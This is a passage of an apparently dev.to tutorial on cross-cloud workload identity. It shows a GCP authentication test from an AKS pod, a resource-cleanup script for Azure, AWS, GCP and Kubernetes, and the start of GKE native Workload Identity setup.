            &lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;GCP_PROJECT_ID&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;buckets&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;storage_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_results&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; GCS buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;buckets&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Authenticated with project: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;project&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;GCP Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_gcp_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like the following for the pod (&lt;code&gt;kubectl logs -f -n default aks-gcp-test&lt;/code&gt;), the AKS-to-GCP authentication worked. Note that the project may print as &lt;code&gt;None&lt;/code&gt;: external account credentials do not embed a project ID, which is why the test code passes &lt;code&gt;GCP_PROJECT_ID&lt;/code&gt; explicitly to the storage client.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GCP Authentication successful!
Found &amp;lt;number of buckets&amp;gt; GCS buckets:
  - bucket-1
  - bucket-2
  - aks-cross-cloud
  - ...

Authenticated with project: None
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Scenario 2 Cleanup
&lt;/h3&gt;

&lt;p&gt;After testing Scenario 2 (AKS cross-cloud authentication), clean up the resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Azure Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;RESOURCE_GROUP&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"my-aks-rg"&lt;/span&gt;
&lt;span class="nv"&gt;IDENTITY_NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"aks-cross-cloud-identity"&lt;/span&gt;

&lt;span class="c"&gt;# Get managed identity client ID&lt;/span&gt;
&lt;span class="nv"&gt;CLIENT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az identity show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; &lt;span class="nv"&gt;$IDENTITY_NAME&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; clientId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete role assignments&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
az role assignment delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Delete federated credential&lt;/span&gt;
az identity federated-credential delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; aks-federated-credential &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--identity-name&lt;/span&gt; &lt;span class="nv"&gt;$IDENTITY_NAME&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt;

&lt;span class="c"&gt;# Delete managed identity&lt;/span&gt;
az identity delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; &lt;span class="nv"&gt;$IDENTITY_NAME&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt;

&lt;span class="c"&gt;# Delete storage account&lt;/span&gt;
az storage account delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; akscrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--yes&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# AWS Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get OIDC provider ARN&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; &lt;span class="nv"&gt;$RESOURCE_GROUP&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete IAM role policy attachments&lt;/span&gt;
aws iam detach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

&lt;span class="c"&gt;# Delete IAM role&lt;/span&gt;
aws iam delete-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role

&lt;span class="c"&gt;# Delete OIDC provider&lt;/span&gt;
&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity &lt;span class="nt"&gt;--query&lt;/span&gt; Account &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;
aws iam delete-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--open-id-connect-provider-arn&lt;/span&gt; &lt;span class="s2"&gt;"arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# GCP Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud projects describe &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"value(projectNumber)"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"aks-gcp-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# Remove IAM policy binding&lt;/span&gt;
gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;

gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.serviceAccountTokenCreator &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"principalSet://iam.googleapis.com/projects/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_NUMBER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"&lt;/span&gt;

&lt;span class="c"&gt;# Remove GCS bucket permissions (if you granted any)&lt;/span&gt;
gsutil iam ch &lt;span class="nt"&gt;-d&lt;/span&gt; serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://aks-cross-cloud

gcloud projects remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCP service account&lt;/span&gt;
gcloud iam service-accounts delete &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity provider&lt;/span&gt;
gcloud iam workload-identity-pools providers delete aks-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-identity-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete workload identity pool&lt;/span&gt;
gcloud iam workload-identity-pools delete aks-pool &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;global &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete gcp bucket&lt;/span&gt;
gcloud storage buckets delete gs://aks-cross-cloud &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Kubernetes Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete test pods&lt;/span&gt;
kubectl delete pod aks-azure-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod aks-aws-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod aks-gcp-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete ConfigMaps&lt;/span&gt;
kubectl delete configmap azure-test-code-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap aws-test-code-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-workload-identity-config-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap gcp-test-code-aks &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete service account&lt;/span&gt;
kubectl delete serviceaccount aks-cross-cloud-sa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
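&lt;p&gt;Note how the AWS portion of the cleanup rebuilds the OIDC provider ARN: it strips the &lt;code&gt;https://&lt;/code&gt; scheme from the issuer URL and appends the remainder to the account's &lt;code&gt;oidc-provider/&lt;/code&gt; prefix. A minimal Python sketch of that derivation (the issuer URL and account ID below are placeholders, not real resources):&lt;/p&gt;

```python
# Illustrative only: mirrors the sed + ARN construction in the cleanup
# script above. AWS stores an OIDC provider under the issuer URL with
# its scheme removed.

def oidc_provider_arn(issuer_url: str, account_id: str) -> str:
    """Build the IAM OIDC provider ARN AWS derives from an issuer URL."""
    provider_id = issuer_url.removeprefix("https://")
    return f"arn:aws:iam::{account_id}:oidc-provider/{provider_id}"

print(oidc_provider_arn("https://oidc.example.com/tenant/", "123456789012"))
# arn:aws:iam::123456789012:oidc-provider/oidc.example.com/tenant/
```

If the provider ARN you pass to &lt;code&gt;aws iam delete-open-id-connect-provider&lt;/code&gt; does not match this exact shape (trailing slash included), the delete fails with &lt;code&gt;NoSuchEntity&lt;/code&gt;.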






&lt;h2&gt;
  
  
  Scenario 3: Pods Running in GKE
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Architecture Overview
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyl6hcmmape278xg4xr1s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyl6hcmmape278xg4xr1s.png" alt="gke" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Authenticating to GCP (Native Workload Identity)
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important:&lt;/strong&gt; With GKE native Workload Identity, Google handles the token exchange automatically. No projected token or external_account JSON is required; this is a key difference from the EKS and AKS cross-cloud scenarios.&lt;br&gt;
&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Enable Workload Identity on GKE cluster (if not already enabled), in our case we did so we can skip this&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="c"&gt;#gcloud container clusters update my-gke-cluster \&lt;/span&gt;
&lt;span class="c"&gt;#  --region=us-central1 \&lt;/span&gt;
&lt;span class="c"&gt;#  --workload-pool=${PROJECT_ID}.svc.id.goog&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create GCP Service Account&lt;/span&gt;
gcloud iam service-accounts create gke-cross-cloud-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"GKE Cross Cloud Service Account"&lt;/span&gt;

&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"gke-cross-cloud-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create GCS bucket&lt;/span&gt;
gcloud storage buckets create gs://gke-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--project&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;us-central1 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--uniform-bucket-level-access&lt;/span&gt;

&lt;span class="c"&gt;# 4. Grant GCS permissions to service account&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

gsutil iam ch serviceAccount:&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;:objectViewer gs://gke-cross-cloud

&lt;span class="c"&gt;# 5. Bind Kubernetes SA to GCP SA&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt; &lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.svc.id.goog[default/gke-cross-cloud-sa]"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
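&lt;p&gt;The member string in step 5 has a strict shape: &lt;code&gt;serviceAccount:PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME]&lt;/code&gt;. A typo in the namespace or Kubernetes service account name does not fail at bind time; it only surfaces later as permission-denied errors in the pod, so building the string programmatically can help. A small illustrative helper (the project ID is a placeholder):&lt;/p&gt;

```python
# Illustrative helper for the Workload Identity binding member used in
# step 5 above. Pure string formatting; no gcloud calls.

def wi_member(project_id: str, namespace: str, ksa_name: str) -> str:
    """Member string binding a Kubernetes SA to a GCP SA via Workload Identity."""
    return f"serviceAccount:{project_id}.svc.id.goog[{namespace}/{ksa_name}]"

print(wi_member("my-project", "default", "gke-cross-cloud-sa"))
# serviceAccount:my-project.svc.id.goog[default/gke-cross-cloud-sa]
```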



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate Scenario 3.1. If authentication is working, you will see the success logs shown further below.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario3-1-gke-to-gcp.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
